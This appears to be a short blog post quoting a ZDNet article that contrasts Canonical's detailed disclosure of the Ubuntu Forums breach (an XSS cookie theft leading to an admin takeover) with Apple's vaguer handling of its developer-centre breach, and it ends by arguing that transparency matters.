I've Been Mugged Blog

Yesterday, Michael Lee has written a good ZDNet article contrasting the post-breach responses by two companies: Canonical and Apple. Both companies experienced data breaches, but responded to the breach in very different ways.

Canonical operates the Ubuntu Forums, and:

"In its latest announcement, Canonical broke down its understanding of how it believes it had been breached... with a moderator account used to post an announcement on the forum. The announcement itself is believed to have contained a cross-site scripting (XSS) attack, designed to steal the login session information from the victim's browser cookie. The compromised moderator account was then used to message three of the boards' administrators, allowing the attacker to hijack an administrator's login session. Once armed with the administrator's privileges, the attacker then inserted a "hook" in the vBulletin web-forum software to allow them to execute arbitrary code..."

Compare that to this:

"... Apple, in contrast, is still having difficulty in bringing its services back online after its Developer services suffered a security breach on the very same weekend. Despite stating that it was informing customers of the breach "in the spirit of transparency", it has not revealed any information on how the attackers attempted their intrusion. Initially, the company took down its developer centre for two days for no apparent reason, telling users that it was "undergoing maintenance for an extended period". Users later began to suspect foul play when they received unauthorised password reset emails. Apple has managed to bring more of its services back online today..."

Transparency matters and consumers expect open, honest, and direct communications.